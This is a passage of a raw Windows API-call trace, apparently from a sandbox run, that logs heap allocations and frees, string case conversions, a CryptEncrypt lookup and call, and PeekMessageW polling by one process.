out: hHeap=0x970000) returned 1 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0229.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0229.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0229.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0229.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0229.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x2f16ca0 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16ca0 | out: hHeap=0x970000) returned 1 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0229.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0229.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0229.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0229.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0229.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0229.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0229.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0229.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0229.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51490 [0229.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51490, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0229.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.851] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0229.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0229.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f670 [0229.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0229.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0229.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0229.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0229.852] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f14818*, pdwDataLen=0x8cef60*=0x2479, dwBufLen=0x2480 | out: pbData=0x2f14818*, pdwDataLen=0x8cef60*=0x2480) returned 1 [0229.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0229.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0229.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0229.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0229.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0229.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0229.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0229.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0229.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0229.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0229.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0229.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0229.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0229.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0229.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0229.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0229.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0229.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0229.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0229.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0229.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0229.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0229.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0229.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.910] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0229.910] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 